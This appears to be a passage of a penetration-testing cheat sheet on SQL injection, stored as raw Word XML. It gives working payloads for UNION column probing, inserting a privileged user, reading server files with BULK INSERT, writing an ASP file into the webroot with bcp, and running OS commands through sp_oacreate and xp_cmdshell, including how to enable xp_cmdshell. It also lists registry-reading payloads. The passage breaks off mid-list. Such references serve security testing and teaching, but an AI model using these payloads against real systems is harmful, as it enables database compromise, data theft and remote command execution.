          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>No error—the second column is a string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE46B6D" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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11223344) UNION SELECT 1,'2',3,NULL WHERE 1=2 –-</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>Error! The third column is not an integer...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F9F09E"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Rinse and repeat until you have all the column types mapped out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4790A3D5"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You will get </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>convert()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> errors before </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> target errors, so remember to start with </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>convert()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> and only then do </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E9F255"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r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Simple INSERT payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34025316"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While </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> statements are normally preferred for testing as non-destructive, an </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>INSERT</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> injection into a user table can allow you to add a new user, hopefully with elevated permissions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583A5346"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 insert into users values( 1, 'hax0r', 'coolpass', 9 )/*</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (MSO+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50998DEE"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r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Database version discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE6B3B6" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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@@version</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (MS) </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>Gives you the database version and other information for SQL Server. This is a constant, so you can just select it like any other column (you don’t need to supply the table name). You can also use </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>@@version</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> in </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>INSERT</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UPDATE</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> statements as </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>well as in functions:</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INSERT INTO members(id, user, pass) VALUES(1, ''+SUBSTRING(@@version,1,10) ,10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06891534" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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version()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (P)</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UNION SELECT NULL, version(), NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FF1553" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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sqlite_version()</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (L)</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UNION SELECT NULL,sqlite_version(),NULL;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE1FC26" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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PRODUCT_COMPONENT_VERSION</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> table (O)</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SELECT version FROM PRODUCT_COMPONENT_VERSION WHERE product LIKE 'Oracle Database%';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27932655"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bookmarkStart w:id="25" w:name="BulkInsert"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bulk insert from a file (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53324D57"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Inserting the content of a file into a table lets you browse local files when you only have database access. If you are dealing with a particularly old version of IIS (up to and including IIS6), if you don’t know the internal path of a web application, you can read the IIS metabase file at </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%systemroot%\system32\inetsrv\MetaBase.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, load it into a table, and then search in it to identify the application path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCDE0DD"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To browse the content of a file, you can use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34386B75"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BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CREATE TABLE foo( line varchar(8000) )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737F33EE"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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BULK INSERT foo FROM 'c:\inetpub\wwwroot\login.asp'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F815CA"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You can then drop the temp table and repeat for another file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5568C89D"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r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL Server utilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE50DF8"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The bcp (Bulk Copy Program) utility (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0155C242"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Using bcp, you can load files into a table or write table data to a file. Login credentials are required to use this utility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520A0550"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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657AB5C3"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Using VBS and WSH scripting (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9BEE21"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ActiveX support in SQL Server lets you use Visual Basic Script (VBS) and Windows Script Host (WSH) scripting. Take this sample shell script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0B3E3C"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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>declare @o int </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>exec sp_oacreate 'wscript.shell', @o out </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>exec sp_oamethod @o, 'run', NULL, 'notepad.exe' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265F39E6"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To inject this into a username field, use a payload like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3CE594"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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>'; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71401B01"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r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL Server stored procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4358F710"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Executing system commands using xp_cmdshell (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470B0AD6"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This is a well-known trick for command injection, but it has two crucial requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAB8E69" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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It’s disabled by default in SQL Server 2005, so you need to enable it first (see below).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0982FD62" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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You need to have admin access to enable it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013F44AA"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Typical payload to get the command prompt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7339D9BD"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EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D631968"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A simple ping check can be useful to see if you’re in (you’ll first need to set up a firewall or sniffer to identify the request):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD25F75"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EXEC master.dbo.xp_cmdshell 'ping example.com'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA4D993"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Note that you can’t directly read the results of this </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EXEC</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> from an error, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> query, or similar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213BE6F2"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bookmarkStart w:id="26" w:name="Enablecmdshell"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enabling xp_cmdshell in SQL Server 2005 (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1217A636"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By default, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> and several other potentially dangerous stored procedures are disabled in SQL Server 2005. Once you have admin access, you can enable these procedures as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3050265B"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EXEC sp_configure 'show advanced options',1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>RECONFIGURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDC4881"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EXEC sp_configure 'xp_cmdshell',1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>RECONFIGURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D62F5D"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Performing registry operations in SQL Server (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E3ECF5"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Stored procedures are available to perform various registry operations. Some of these are undocumented and may change over time:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50065B9A" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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xp_regaddmultistring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF512AA" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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xp_regdeletekey</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD9D6EE" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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lastRenderedPageBreak/>
        <w:t>xp_regdeletevalue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521733C3" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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xp_regenumkeys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F29AEBB" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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xp_regenumvalues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D21358A" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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xp_regread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0FE7C4" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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xp_regremovemultistring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233B34FA" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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xp_regwrite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316C2E71"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Sample payloads to read values from a registry path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3E73CE"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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares' </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CED55A4"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Other useful stored procedures for SQL Server (S)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FB4A13" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Managing services: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
